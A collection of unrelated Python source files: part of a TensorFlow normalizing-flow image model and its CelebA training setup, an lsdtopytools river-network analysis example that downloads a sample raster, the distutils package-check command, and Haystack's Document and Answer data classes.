ml_logscales = tf.maximum(ml_logscales, -7.)
assert s.shape == t.shape == [B, H, W, C]
assert ml_logits.shape == ml_means.shape == ml_logscales.shape == [B, H, W, C, components]
return s, t, ml_logits, ml_means, ml_logscales
self.template = tf.make_template(self.__class__.__name__, f)
def forward(self, x, init=False, ema=None, dropout_p=0., verbose=True, context=None, **kwargs):
assert isinstance(x, tuple)
cf, ef = x
float_ef = at_least_float32(ef)
s, t, ml_logits, ml_means, ml_logscales = self.template(
cf, init=init, ema=ema, dropout_p=dropout_p, verbose=verbose, context=context
)
out = tf.exp(
mixlogistic_logcdf(x=float_ef, prior_logits=ml_logits, means=ml_means, logscales=ml_logscales)
)
out, scale_logd = self.scale_flow.forward(out)
if self.with_affine:
assert out.shape == s.shape == t.shape
out = tf.exp(s) * out + t
logd = mixlogistic_logpdf(x=float_ef, prior_logits=ml_logits, means=ml_means, logscales=ml_logscales)
if self.with_affine:
assert s.shape == logd.shape
logd += s
logd = tf.reduce_sum(tf.layers.flatten(logd), axis=1)
assert scale_logd.shape == logd.shape
logd += scale_logd
out, logd = map(to_default_floatx, [out, logd])
assert out.shape == ef.shape == cf.shape and out.dtype == ef.dtype == logd.dtype == cf.dtype
return (cf, out), logd
def inverse(self, y, init=False, ema=None, dropout_p=0., verbose=True, context=None, **kwargs):
assert isinstance(y, tuple)
cf, ef = y
float_ef = at_least_float32(ef)
s, t, ml_logits, ml_means, ml_logscales = self.template(
cf, init=init, ema=ema, dropout_p=dropout_p, verbose=verbose, context=context
)
out = float_ef
if self.with_affine:
out = tf.exp(-s) * (out - t)
out, invscale_logd = self.scale_flow.inverse(out)
out = tf.clip_by_value(out, 1e-5, 1. - 1e-5)
out = mixlogistic_invcdf(y=out, prior_logits=ml_logits, means=ml_means, logscales=ml_logscales)
logd = mixlogistic_logpdf(x=out, prior_logits=ml_logits, means=ml_means, logscales=ml_logscales)
if self.with_affine:
assert s.shape == logd.shape
logd += s
logd = -tf.reduce_sum(tf.layers.flatten(logd), axis=1)
assert invscale_logd.shape == logd.shape
logd += invscale_logd
out, logd = map(to_default_floatx, [out, logd])
assert out.shape == ef.shape == cf.shape and out.dtype == ef.dtype == logd.dtype == cf.dtype
return (cf, out), logd
class MixLogisticAttnCoupling(Flow):
"""
CDF of mixture of logistics, followed by affine
"""
def __init__(self, filters, blocks, use_nin, components, attn_heads, use_ln,
with_affine=True, use_final_nin=False, init_scale=0.1, nonlinearity=concat_elu):
self.components = components
self.with_affine = with_affine
self.scale_flow = Inverse(Sigmoid())
def f(x, init, ema, dropout_p, verbose, context):
if init and verbose:
with tf.variable_scope('debug'):
xmean, xvar = tf.nn.moments(x, axes=list(range(len(x.get_shape()))))
x = tf.Print(
x,
[
tf.shape(x), xmean, tf.sqrt(xvar), tf.reduce_min(x), tf.reduce_max(x),
tf.reduce_any(tf.is_nan(x)), tf.reduce_any(tf.is_inf(x))
],
message='{} (shape/mean/std/min/max/nan/inf) '.format(self.template.variable_scope.name),
summarize=10,
)
B, H, W, C = x.shape.as_list()
pos_emb = to_default_floatx(get_var(
'pos_emb', ema=ema, shape=[H, W, filters], initializer=tf.random_normal_initializer(stddev=0.01),
))
x = conv2d(x, name='c1', num_units=filters, init=init, ema=ema)
for i_block in range(blocks):
with tf.variable_scope('block{}'.format(i_block)):
x = gated_resnet(
x, name='conv', a=context, use_nin=use_nin, init=init, ema=ema, dropout_p=dropout_p
)
if use_ln:
x = norm(x, name='ln1', ema=ema)
x = attn(
x, name='attn', pos_emb=pos_emb, heads=attn_heads, init=init, ema=ema, dropout_p=dropout_p
)
if use_ln:
x = norm(x, name='ln2', ema=ema)
assert x.shape == [B, H, W, filters]
x = nonlinearity(x)
x = (nin if use_final_nin else conv2d)(
x, name='c2', num_units=C * (2 + 3 * components), init_scale=init_scale, init=init, ema=ema
)
assert x.shape == [B, H, W, C * (2 + 3 * components)]
x = tf.reshape(x, [B, H, W, C, 2 + 3 * components])
x = at_least_float32(x) # do mix-logistics stuff in float32
s, t = tf.tanh(x[:, :, :, :, 0]), x[:, :, :, :, 1]
ml_logits, ml_means, ml_logscales = tf.split(x[:, :, :, :, 2:], 3, axis=4)
ml_logscales = tf.maximum(ml_logscales, -7.)
assert s.shape == t.shape == [B, H, W, C]
assert ml_logits.shape == ml_means.shape == ml_logscales.shape == [B, H, W, C, components]
return s, t, ml_logits, ml_means, ml_logscales
self.template = tf.make_template(self.__class__.__name__, f)
def forward(self, x, init=False, ema=None, dropout_p=0., verbose=True, context=None, **kwargs):
assert isinstance(x, tuple)
cf, ef = x
float_ef = at_least_float32(ef)
s, t, ml_logits, ml_means, ml_logscales = self.template(
cf, init=init, ema=ema, dropout_p=dropout_p, verbose=verbose, context=context
)
out = tf.exp(
mixlogistic_logcdf(x=float_ef, prior_logits=ml_logits, means=ml_means, logscales=ml_logscales)
)
out, scale_logd = self.scale_flow.forward(out)
if self.with_affine:
assert out.shape == s.shape == t.shape
out = tf.exp(s) * out + t
logd = mixlogistic_logpdf(x=float_ef, prior_logits=ml_logits, means=ml_means, logscales=ml_logscales)
if self.with_affine:
assert s.shape == logd.shape
logd += s
logd = tf.reduce_sum(tf.layers.flatten(logd), axis=1)
assert scale_logd.shape == logd.shape
logd += scale_logd
out, logd = map(to_default_floatx, [out, logd])
assert out.shape == ef.shape == cf.shape and out.dtype == ef.dtype == logd.dtype == cf.dtype
return (cf, out), logd
def inverse(self, y, init=False, ema=None, dropout_p=0., verbose=True, context=None, **kwargs):
assert isinstance(y, tuple)
cf, ef = y
float_ef = at_least_float32(ef)
s, t, ml_logits, ml_means, ml_logscales = self.template(
cf, init=init, ema=ema, dropout_p=dropout_p, verbose=verbose, context=context
)
out = float_ef
if self.with_affine:
out = tf.exp(-s) * (out - t)
out, invscale_logd = self.scale_flow.inverse(out)
out = tf.clip_by_value(out, 1e-5, 1. - 1e-5)
out = mixlogistic_invcdf(y=out, prior_logits=ml_logits, means=ml_means, logscales=ml_logscales)
logd = mixlogistic_logpdf(x=out, prior_logits=ml_logits, means=ml_means, logscales=ml_logscales)
if self.with_affine:
assert s.shape == logd.shape
logd += s
logd = -tf.reduce_sum(tf.layers.flatten(logd), axis=1)
assert invscale_logd.shape == logd.shape
logd += invscale_logd
out, logd = map(to_default_floatx, [out, logd])
assert out.shape == ef.shape == cf.shape and out.dtype == ef.dtype == logd.dtype == cf.dtype
return (cf, out), logd
def gaussian_sample_logp(shape, dtype):
eps = tf.random_normal(shape)
logp = Normal(0., 1.).log_prob(eps)
assert logp.shape == eps.shape
logp = tf.reduce_sum(tf.layers.flatten(logp), axis=1)
return tf.cast(eps, dtype=dtype), tf.cast(logp, dtype=dtype)
class UniformDequantizer(Flow):
def forward(self, x, **kwargs):
return x + tf.random_uniform(x.shape.as_list(), minval=0, maxval=1, dtype=DEFAULT_FLOATX), tf.zeros(x.shape.as_list()[0])
def inverse(self, y, **kwargs):
#‾\_(ツ)_/‾
pass
class Dequantizer(Flow):
def __init__(self, dequant_flow):
super().__init__()
assert isinstance(dequant_flow, Flow)
self.dequant_flow = dequant_flow
def deep_processor(x, *, init, ema, dropout_p):
(this, that), _ = CheckerboardSplit().forward(x)
processed_context = conv2d(tf.concat([this, that], 3), name='proj', num_units=32, init=init, ema=ema)
for i in range(5):
processed_context = gated_resnet(
processed_context, name='c{}'.format(i),
a=None, dropout_p=dropout_p, ema=ema, init=init,
use_nin=False
)
processed_context = norm(processed_context, name='dqln{}'.format(i), ema=ema)
return processed_context
self.context_proc = tf.make_template("context_proc", deep_processor)
def forward(self, x, init=False, ema=None, dropout_p=0., verbose=True, **kwargs):
eps, eps_logli = gaussian_sample_logp(x.shape, dtype=DEFAULT_FLOATX)
unbound_xd, logd = self.dequant_flow.forward(
eps,
context=self.context_proc(x / 32.0 - 0.5, init=init, ema=ema, dropout_p=dropout_p),
init=init, ema=ema, dropout_p=dropout_p, verbose=verbose
)
xd, sigmoid_logd = Sigmoid().forward(unbound_xd)
assert x.shape == xd.shape and logd.shape == sigmoid_logd.shape == eps_logli.shape
return x + xd, logd + sigmoid_logd - eps_logli
def construct(*, filters, blocks, components, attn_heads, use_nin, use_ln):
dequant_coupling_kwargs = dict(
filters=filters, blocks=5, use_nin=use_nin, components=components, attn_heads=attn_heads, use_ln=use_ln
)
dequant_flow = Dequantizer(Compose([
CheckerboardSplit(),
Norm(),
MixLogisticCoupling(**dequant_coupling_kwargs), TupleFlip(),
Norm(),
MixLogisticCoupling(**dequant_coupling_kwargs), TupleFlip(),
Norm(),
MixLogisticCoupling(**dequant_coupling_kwargs), TupleFlip(),
Norm(),
MixLogisticCoupling(**dequant_coupling_kwargs), TupleFlip(),
Inverse(CheckerboardSplit()),
]))
#dequant_flow = UniformDequantizer()
coupling_kwargs = dict(
filters=filters, blocks=blocks, use_nin=use_nin, components=components, attn_heads=attn_heads, use_ln=use_ln
)
flow = Compose([
#128x128x3
ImgProc(),
#64x64x12
SpaceToDepth(),
#32x32x48
SpaceToDepth(),
CheckerboardSplit(),
Norm(),
MixLogisticAttnCoupling(**coupling_kwargs), TupleFlip(),
Norm(),
MixLogisticAttnCoupling(**coupling_kwargs), TupleFlip(),
Norm(),
MixLogisticAttnCoupling(**coupling_kwargs), TupleFlip(),
Norm(),
MixLogisticAttnCoupling(**coupling_kwargs), TupleFlip(),
Inverse(CheckerboardSplit()),
#16x16x192
SpaceToDepth(),
ChannelSplit(),
Norm(),
MixLogisticAttnCoupling(**coupling_kwargs), TupleFlip(),
Norm(),
MixLogisticAttnCoupling(**coupling_kwargs), TupleFlip(),
Inverse(ChannelSplit()),
CheckerboardSplit(),
Norm(),
MixLogisticAttnCoupling(**coupling_kwargs), TupleFlip(),
Norm(),
MixLogisticAttnCoupling(**coupling_kwargs), TupleFlip(),
Inverse(CheckerboardSplit()),
# 8x8x768
SpaceToDepth(),
ChannelSplit(),
Norm(),
MixLogisticAttnCoupling(**coupling_kwargs), TupleFlip(),
Norm(),
MixLogisticAttnCoupling(**coupling_kwargs), TupleFlip(),
Inverse(ChannelSplit()),
CheckerboardSplit(),
Norm(),
MixLogisticAttnCoupling(**coupling_kwargs), TupleFlip(),
Norm(),
MixLogisticAttnCoupling(**coupling_kwargs), TupleFlip(),
Inverse(CheckerboardSplit()),
])
return dequant_flow, flow
def main():
global DEFAULT_FLOATX
DEFAULT_FLOATX = tf.float32
max_lr = 1e-5
warmup_steps = 50000
bs = 48
# set this to a smaller value if it can't fit on your GPU.
# make sure bs % num_mpi_processes == 0. There will be an assertion error otherwise.
def lr_schedule(step, *, decay=0.9995):
"""Ramp up to 1e-5 in 20K steps, stay there for the rest of training."""
if step < warmup_steps:
return max_lr * step / warmup_steps
else:
return 1e-5
"""
def lr_schedule(step, *, decay=0.9995):
#Ramp up to 4e-5 in 20K steps, stay there till 50K, geometric decay to 1e-5 by 55K steps, stay there
global curr_lr
if step < warmup_steps:
return max_lr * step / warmup_steps
elif step >= warmup_steps and step <= (2.5 * warmup_steps):
curr_lr = max_lr
return max_lr
elif step > (2.5 * warmup_steps) and curr_lr > 1e-5:
curr_lr *= decay
return curr_lr
return curr_lr
"""
dropout_p = 0.
filters = 96
blocks = 12
components = 4 # logistic mixture components
attn_heads = 4
use_ln = True
floatx_str = {tf.float32: 'fp32', tf.float16: 'fp16'}[DEFAULT_FLOATX]
flow_training_celeba.train(
flow_constructor=lambda: construct(
filters=filters,
components=components,
attn_heads=attn_heads,
blocks=blocks,
use_nin=True,
use_ln=use_ln
),
logdir=f'~/logs/2018-11-19/celeba128_5bit_ELU_code_release_mix{components}_b{blocks}_f{filters}_h{attn_heads}_ln{int(use_ln)}_lr{max_lr}_bs{bs}_drop{dropout_p}_{floatx_str}',
lr_schedule=lr_schedule,
dropout_p=dropout_p,
seed=0,
init_bs=64, # set this to a smaller value if it can't fit on your GPU.
dataset='celeba128_5bit',
total_bs=bs,
ema_decay=.999,
steps_per_log=100,
steps_per_dump=5000,
steps_per_samples=5000,
max_grad_norm=1.,
dtype=DEFAULT_FLOATX,
scale_loss=1e-2 if DEFAULT_FLOATX == tf.float16 else None,
n_epochs=1000,
restore_checkpoint=None, # put in path to checkpoint in the format: path_to_checkpoint/model (no .meta / .ckpt)
save_jpg=True, # turn this on/off based on whether you want to save jpg version of low-bit samples while the model is training.
)
if __name__ == '__main__':
main()
|
the-stack_106_15882
|
"""
This example script download a test raster, caculates and plot normalised channel steepness (ksn).
Read the comments to understand each steps. Copy and adapt this script to learn.
If any questions: [email protected]
B.G.
"""
# If you are facing a common matplotlib issue, uncomment that:
#################################################
# import matplotlib
# matplotlib.use("Agg")
#################################################
from lsdtopytools import LSDDEM # I am telling python I will need this module to run.
from lsdtopytools import quickplot, quickplot_movern # We will need the plotting routines
import time as clock # Basic benchmarking
import sys # manage the argv
from matplotlib import pyplot as plt # plotting
import numpy as np #
# Run with download to download the test dem:
# `python plot_ksn_analysis.py download` instead of `python plot_ksn_analysis.py`
##################################################################################################
# The following code download a test site in scotland. Replace it with your own raster if you need
# Requires wget, a small python portage of linux command wget to all OSs
# "pip install wget" will install it easily
if(len(sys.argv)>1):
if(sys.argv[1].lower() == "download"):
import wget
print("Downloading a test dataset: ")
file = wget.download("https://github.com/LSDtopotools/LSDTT_workshop_data/raw/master/WAWater.bil")
wget.download("https://github.com/LSDtopotools/LSDTT_workshop_data/raw/master/WAWater.hdr")
print("Done")
##################################################################################################
my_raster_path = "./" # I am telling saving my path to a variable. In this case, I assume the rasters is in the same folder than my script
file_name = "WAWater.bil" # The name of your raster with extension. RasterIO then takes care internally of decoding it. Good guy rasterio!
# I am now telling lsdtopytools where is my raster, and What do I want to do with it. No worries It will deal with the detail internally
mydem = LSDDEM(path = my_raster_path, file_name = file_name) # If your dem is already preprocessed: filled or carved basically, add: , is_preprocessed = True
## Loaded in the system, now preprocessing: I want to carve it and imposing a minimal slope on remaining flat surfaces: 0.0001
mydem.PreProcessing(filling = True, carving = True, minimum_slope_for_filling = 0.0001) # Unecessary if already preprocessed of course.
mydem.ExtractRiverNetwork( method = "area_threshold", area_threshold_min = 500)
mydem.DefineCatchment( method="from_XY", X_coords = [527107, 527033, 530832], Y_coords = [6190656, 6191745, 6191015])
mydem.GenerateChi(theta=0.45,A_0 = 1)
print("Starting movern extraction")
mydem.cppdem.calculate_movern_disorder(0.1, 0.05, 18, 1, 1000) # start theta, delta, n, A0, threashold
print("movern done, getting the data")
quickplot_movern.plot_disorder_results(mydem, normalise = True, figsize = (4,3), dpi = 300, output = "save", format_figure = "png", legend = True,
cumulative_best_fit = True)
quickplot_movern.plot_disorder_map(mydem ,figure_width = 4, figure_width_units = "inches", cmap = "jet", alpha_hillshade = 0.95,
this_fontsize = 6, alpha_catchments = 0.75, dpi = 300, output = "save", format_figure = "png")
|
the-stack_106_15883
|
"""distutils.command.check
Implements the Distutils 'check' command.
"""
from distutils.core import Command
from distutils.errors import DistutilsSetupError
try:
# docutils is installed
from docutils.utils import Reporter
from docutils.parsers.rst import Parser
from docutils import frontend
from docutils import nodes
from io import StringIO
class SilentReporter(Reporter):
def __init__(self, source, report_level, halt_level, stream=None,
debug=0, encoding='ascii', error_handler='replace'):
self.messages = []
Reporter.__init__(self, source, report_level, halt_level, stream,
debug, encoding, error_handler)
def system_message(self, level, message, *children, **kwargs):
self.messages.append((level, message, children, kwargs))
return nodes.system_message(message, level=level,
type=self.levels[level],
*children, **kwargs)
HAS_DOCUTILS = True
except Exception:
# Catch all exceptions because exceptions besides ImportError probably
# indicate that docutils is not ported to Py3k.
HAS_DOCUTILS = False
class check(Command):
"""This command checks the meta-data of the package.
"""
description = ("perform some checks on the package")
user_options = [('metadata', 'm', 'Verify meta-data'),
('restructuredtext', 'r',
('Checks if long string meta-data syntax '
'are reStructuredText-compliant')),
('strict', 's',
'Will exit with an error if a check fails')]
boolean_options = ['metadata', 'restructuredtext', 'strict']
def initialize_options(self):
"""Sets default values for options."""
self.restructuredtext = 0
self.metadata = 1
self.strict = 0
self._warnings = 0
def finalize_options(self):
pass
def warn(self, msg):
"""Counts the number of warnings that occurs."""
self._warnings += 1
return Command.warn(self, msg)
def run(self):
"""Runs the command."""
# perform the various tests
if self.metadata:
self.check_metadata()
if self.restructuredtext:
if HAS_DOCUTILS:
self.check_restructuredtext()
elif self.strict:
raise DistutilsSetupError('The docutils package is needed.')
# let's raise an error in strict mode, if we have at least
# one warning
if self.strict and self._warnings > 0:
raise DistutilsSetupError('Please correct your package.')
def check_metadata(self):
"""Ensures that all required elements of meta-data are supplied.
name, version, URL, (author and author_email) or
(maintainer and maintainer_email)).
Warns if any are missing.
"""
metadata = self.distribution.metadata
missing = []
for attr in ('name', 'version', 'url'):
if not (hasattr(metadata, attr) and getattr(metadata, attr)):
missing.append(attr)
if missing:
self.warn("missing required meta-data: %s" % ', '.join(missing))
if metadata.author:
if not metadata.author_email:
self.warn("missing meta-data: if 'author' supplied, " +
"'author_email' must be supplied too")
elif metadata.maintainer:
if not metadata.maintainer_email:
self.warn("missing meta-data: if 'maintainer' supplied, " +
"'maintainer_email' must be supplied too")
else:
self.warn("missing meta-data: either (author and author_email) " +
"or (maintainer and maintainer_email) " +
"must be supplied")
def check_restructuredtext(self):
"""Checks if the long string fields are reST-compliant."""
data = self.distribution.get_long_description()
for warning in self._check_rst_data(data):
line = warning[-1].get('line')
if line is None:
warning = warning[1]
else:
warning = '%s (line %s)' % (warning[1], line)
self.warn(warning)
def _check_rst_data(self, data):
"""Returns warnings when the provided data doesn't compile."""
# the include and csv_table directives need this to be a path
source_path = self.distribution.script_name or 'setup.py'
parser = Parser()
settings = frontend.OptionParser(components=(Parser,)).get_default_values()
settings.tab_width = 4
settings.pep_references = None
settings.rfc_references = None
reporter = SilentReporter(source_path,
settings.report_level,
settings.halt_level,
stream=settings.warning_stream,
debug=settings.debug,
encoding=settings.error_encoding,
error_handler=settings.error_encoding_error_handler)
document = nodes.document(settings, reporter, source=source_path)
document.note_source(source_path, -1)
try:
parser.parse(data, document)
except AttributeError as e:
reporter.messages.append(
(-1, 'Could not finish the parsing: %s.' % e, '', {}))
return reporter.messages
|
the-stack_106_15886
|
from __future__ import annotations
import typing
from typing import Any, Optional, Dict, List, Union, Optional
from dataclasses import asdict
try:
from typing import Literal
except ImportError:
from typing_extensions import Literal # type: ignore
if typing.TYPE_CHECKING:
from dataclasses import dataclass
else:
from pydantic.dataclasses import dataclass
from pydantic.json import pydantic_encoder
from pathlib import Path
from uuid import uuid4
import mmh3
import numpy as np
import logging
import time
import json
import pandas as pd
import ast
logger = logging.getLogger(__name__)
from pydantic import BaseConfig
BaseConfig.arbitrary_types_allowed = True
@dataclass
class Document:
content: Union[str, pd.DataFrame]
content_type: Literal["text", "table", "image"]
id: str
meta: Dict[str, Any]
score: Optional[float] = None
embedding: Optional[np.ndarray] = None
id_hash_keys: Optional[List[str]] = None
# We use a custom init here as we want some custom logic. The annotations above are however still needed in order
# to use some dataclass magic like "asdict()". See https://www.python.org/dev/peps/pep-0557/#custom-init-method
# They also help in annotating which object attributes will always be present (e.g. "id") even though they
# don't need to passed by the user in init and are rather initialized automatically in the init
def __init__(
self,
content: Union[str, pd.DataFrame],
content_type: Literal["text", "table", "image"] = "text",
id: Optional[str] = None,
score: Optional[float] = None,
meta: Dict[str, Any] = None,
embedding: Optional[np.ndarray] = None,
id_hash_keys: Optional[List[str]] = None,
):
"""
One of the core data classes in Haystack. It's used to represent documents / passages in a standardized way within Haystack.
Documents are stored in DocumentStores, are returned by Retrievers, are the input for Readers and are used in
many other places that manipulate or interact with document-level data.
Note: There can be multiple Documents originating from one file (e.g. PDF), if you split the text
into smaller passages. We'll have one Document per passage in this case.
Each document has a unique ID. This can be supplied by the user or generated automatically.
It's particularly helpful for handling of duplicates and referencing documents in other objects (e.g. Labels)
There's an easy option to convert from/to dicts via `from_dict()` and `to_dict`.
:param content: Content of the document. For most cases, this will be text, but it can be a table or image.
:param content_type: One of "image", "table" or "image". Haystack components can use this to adjust their
handling of Documents and check compatibility.
:param id: Unique ID for the document. If not supplied by the user, we'll generate one automatically by
creating a hash from the supplied text. This behaviour can be further adjusted by `id_hash_keys`.
:param score: The relevance score of the Document determined by a model (e.g. Retriever or Re-Ranker).
In the range of [0,1], where 1 means extremely relevant.
:param meta: Meta fields for a document like name, url, or author in the form of a custom dict (any keys and values allowed).
:param embedding: Vector encoding of the text
:param id_hash_keys: Generate the document id from a custom list of strings that refere to the documents attributes.
If you want ensure you don't have duplicate documents in your DocumentStore but texts are
not unique, you can modify the metadata and pass e.g. "meta" to this field (e.g. ["content", "meta"]).
In this case the id will be generated by using the content and the defined metadata.
"""
if content is None:
raise ValueError(f"Can't create 'Document': Mandatory 'content' field is None")
self.content = content
self.content_type = content_type
self.score = score
self.meta = meta or {}
allowed_hash_key_attributes = ["content", "content_type", "score", "meta", "embedding"]
if id_hash_keys is not None:
if not set(id_hash_keys) <= set(allowed_hash_key_attributes): # type: ignore
raise ValueError(
f"You passed custom strings {id_hash_keys} to id_hash_keys which is deprecated. Supply instead a list of Document's attribute names that the id should be based on (e.g. {allowed_hash_key_attributes}). See https://github.com/deepset-ai/haystack/pull/1910 for details)"
)
if embedding is not None:
embedding = np.asarray(embedding)
self.embedding = embedding
# Create a unique ID (either new one, or one from user input)
if id:
self.id: str = str(id)
else:
self.id: str = self._get_id(id_hash_keys=id_hash_keys)
def _get_id(self, id_hash_keys: Optional[List[str]] = None):
"""
Generate the id of a document by creating the hash of strings. By default the content of a document is
used to generate the hash. There are two ways of modifying the generated id of a document. Either static keys
or a selection of the content.
:param id_hash_keys: Optional list of fields that should be dynamically used to generate the hash.
"""
if id_hash_keys is None:
return "{:02x}".format(mmh3.hash128(str(self.content), signed=False))
final_hash_key = ""
for attr in id_hash_keys:
final_hash_key += ":" + str(getattr(self, attr))
if final_hash_key == "":
raise ValueError(
f"Cant't create 'Document': 'id_hash_keys' must contain at least one of ['content', 'meta']"
)
return "{:02x}".format(mmh3.hash128(final_hash_key, signed=False))
def to_dict(self, field_map={}) -> Dict:
"""
Convert Document to dict. An optional field_map can be supplied to change the names of the keys in the
resulting dict. This way you can work with standardized Document objects in Haystack, but adjust the format that
they are serialized / stored in other places (e.g. elasticsearch)
Example:
| doc = Document(content="some text", content_type="text")
| doc.to_dict(field_map={"custom_content_field": "content"})
| >>> {"custom_content_field": "some text", content_type": "text"}
:param field_map: Dict with keys being the custom target keys and values being the standard Document attributes
:return: dict with content of the Document
"""
inv_field_map = {v: k for k, v in field_map.items()}
_doc: Dict[str, str] = {}
for k, v in self.__dict__.items():
if k == "content":
# Convert pd.DataFrame to list of rows for serialization
if self.content_type == "table" and isinstance(self.content, pd.DataFrame):
v = [self.content.columns.tolist()] + self.content.values.tolist()
k = k if k not in inv_field_map else inv_field_map[k]
_doc[k] = v
return _doc
@classmethod
def from_dict(cls, dict, field_map={}, id_hash_keys=None):
"""
Create Document from dict. An optional field_map can be supplied to adjust for custom names of the keys in the
input dict. This way you can work with standardized Document objects in Haystack, but adjust the format that
they are serialized / stored in other places (e.g. elasticsearch)
Example:
| my_dict = {"custom_content_field": "some text", content_type": "text"}
| Document.from_dict(my_dict, field_map={"custom_content_field": "content"})
:param field_map: Dict with keys being the custom target keys and values being the standard Document attributes
:return: dict with content of the Document
"""
_doc = dict.copy()
init_args = ["content", "content_type", "id", "score", "question", "meta", "embedding"]
if "meta" not in _doc.keys():
_doc["meta"] = {}
# copy additional fields into "meta"
for k, v in _doc.items():
if k not in init_args and k not in field_map:
_doc["meta"][k] = v
# remove additional fields from top level
_new_doc = {}
for k, v in _doc.items():
if k in init_args:
_new_doc[k] = v
elif k in field_map:
k = field_map[k]
_new_doc[k] = v
if _doc.get("id") is None:
_new_doc["id_hash_keys"] = id_hash_keys
# Convert list of rows to pd.DataFrame
if _new_doc.get("content_type", None) == "table" and isinstance(_new_doc["content"], list):
_new_doc["content"] = pd.DataFrame(columns=_new_doc["content"][0], data=_new_doc["content"][1:])
return cls(**_new_doc)
def to_json(self, field_map={}) -> str:
d = self.to_dict(field_map=field_map)
j = json.dumps(d, cls=NumpyEncoder)
return j
@classmethod
def from_json(cls, data: str, field_map={}):
d = json.loads(data)
return cls.from_dict(d, field_map=field_map)
def __eq__(self, other):
return (
isinstance(other, self.__class__)
and getattr(other, "content", None) == self.content
and getattr(other, "content_type", None) == self.content_type
and getattr(other, "id", None) == self.id
and getattr(other, "score", None) == self.score
and getattr(other, "meta", None) == self.meta
and np.array_equal(getattr(other, "embedding", None), self.embedding)
and getattr(other, "id_hash_keys", None) == self.id_hash_keys
)
def __repr__(self):
return f"<Document: {str(self.to_dict())}>"
def __str__(self):
# In some cases, self.content is None (therefore not subscriptable)
if not self.content:
return f"<Document: id={self.id}, content=None>"
return f"<Document: id={self.id}, content='{self.content[:100]} {'...' if len(self.content) > 100 else ''}'>"
def __lt__(self, other):
"""Enable sorting of Documents by score"""
return self.score < other.score
@dataclass
class Span:
start: int
end: int
"""
Defining a sequence of characters (Text span) or cells (Table span) via start and end index.
For extractive QA: Character where answer starts/ends
For TableQA: Cell where the answer starts/ends (counted from top left to bottom right of table)
:param start: Position where the span starts
:param end: Position where the spand ends
"""
@dataclass
class Answer:
answer: str
type: Literal["generative", "extractive", "other"] = "extractive"
score: Optional[float] = None
context: Optional[Union[str, pd.DataFrame]] = None
offsets_in_document: Optional[List[Span]] = None
offsets_in_context: Optional[List[Span]] = None
document_id: Optional[str] = None
meta: Optional[Dict[str, Any]] = None
"""
The fundamental object in Haystack to represent any type of Answers (e.g. extractive QA, generative QA or TableQA).
For example, it's used within some Nodes like the Reader, but also in the REST API.
:param answer: The answer string. If there's no possible answer (aka "no_answer" or "is_impossible) this will be an empty string.
:param type: One of ("generative", "extractive", "other"): Whether this answer comes from an extractive model
(i.e. we can locate an exact answer string in one of the documents) or from a generative model
(i.e. no pointer to a specific document, no offsets ...).
:param score: The relevance score of the Answer determined by a model (e.g. Reader or Generator).
In the range of [0,1], where 1 means extremely relevant.
:param context: The related content that was used to create the answer (i.e. a text passage, part of a table, image ...)
:param offsets_in_document: List of `Span` objects with start and end positions of the answer **in the
document** (as stored in the document store).
For extractive QA: Character where answer starts => `Answer.offsets_in_document[0].start
For TableQA: Cell where the answer starts (counted from top left to bottom right of table) => `Answer.offsets_in_document[0].start
(Note that in TableQA there can be multiple cell ranges that are relevant for the answer, thus there can be multiple `Spans` here)
:param offsets_in_context: List of `Span` objects with start and end positions of the answer **in the
context** (i.e. the surrounding text/table of a certain window size).
For extractive QA: Character where answer starts => `Answer.offsets_in_document[0].start
For TableQA: Cell where the answer starts (counted from top left to bottom right of table) => `Answer.offsets_in_document[0].start
(Note that in TableQA there can be multiple cell ranges that are relevant for the answer, thus there can be multiple `Spans` here)
:param document_id: ID of the document that the answer was located it (if any)
:param meta: Dict that can be used to associate any kind of custom meta data with the answer.
In extractive QA, this will carry the meta data of the document where the answer was found.
"""
def __post_init__(self):
# In case offsets are passed as dicts rather than Span objects we convert them here
# For example, this is used when instantiating an object via from_json()
if self.offsets_in_document is not None:
self.offsets_in_document = [Span(**e) if isinstance(e, dict) else e for e in self.offsets_in_document]
if self.offsets_in_context is not None:
self.offsets_in_context = [Span(**e) if isinstance(e, dict) else e for e in self.offsets_in_context]
if self.meta is None:
self.meta = {}
def __lt__(self, other):
"""Enable sorting of Answers by score"""
return self.score < other.score
def __str__(self):
# self.context might be None (therefore not subscriptable)
if not self.context:
return f"<Answer: answer='{self.answer}', score={self.score}, context=None>"
return f"<Answer: answer='{self.answer}', score={self.score}, context='{self.context[:50]}{'...' if len(self.context) > 50 else ''}'>"
def __repr__(self):
return f"<Answer {asdict(self)}>"
def to_dict(self):
return asdict(self)
@classmethod
def from_dict(cls, dict: dict):
return _pydantic_dataclass_from_dict(dict=dict, pydantic_dataclass_type=cls)
def to_json(self):
return json.dumps(self, default=pydantic_encoder)
@classmethod
def from_json(cls, data):
if type(data) == str:
data = json.loads(data)
return cls.from_dict(data)
@dataclass
class Label:
id: str
query: str
document: Document
is_correct_answer: bool
is_correct_document: bool
origin: Literal["user-feedback", "gold-label"]
answer: Optional[Answer] = None
no_answer: Optional[bool] = None
pipeline_id: Optional[str] = None
created_at: Optional[str] = None
updated_at: Optional[str] = None
meta: Optional[dict] = None
# We use a custom init here as we want some custom logic. The annotations above are however still needed in order
# to use some dataclass magic like "asdict()". See https://www.python.org/dev/peps/pep-0557/#custom-init-method
def __init__(
self,
query: str,
document: Document,
is_correct_answer: bool,
is_correct_document: bool,
origin: Literal["user-feedback", "gold-label"],
answer: Optional[Answer],
id: Optional[str] = None,
no_answer: Optional[bool] = None,
pipeline_id: Optional[str] = None,
created_at: Optional[str] = None,
updated_at: Optional[str] = None,
meta: Optional[dict] = None,
):
"""
Object used to represent label/feedback in a standardized way within Haystack.
This includes labels from dataset like SQuAD, annotations from labeling tools,
or, user-feedback from the Haystack REST API.
:param query: the question (or query) for finding answers.
:param document:
:param answer: the answer object.
:param is_correct_answer: whether the sample is positive or negative.
:param is_correct_document: in case of negative sample(is_correct_answer is False), there could be two cases;
incorrect answer but correct document & incorrect document. This flag denotes if
the returned document was correct.
:param origin: the source for the labels. It can be used to later for filtering.
:param id: Unique ID used within the DocumentStore. If not supplied, a uuid will be generated automatically.
:param no_answer: whether the question in unanswerable.
:param pipeline_id: pipeline identifier (any str) that was involved for generating this label (in-case of user feedback).
:param created_at: Timestamp of creation with format yyyy-MM-dd HH:mm:ss.
Generate in Python via time.strftime("%Y-%m-%d %H:%M:%S").
:param created_at: Timestamp of update with format yyyy-MM-dd HH:mm:ss.
Generate in Python via time.strftime("%Y-%m-%d %H:%M:%S")
:param meta: Meta fields like "annotator_name" in the form of a custom dict (any keys and values allowed).
"""
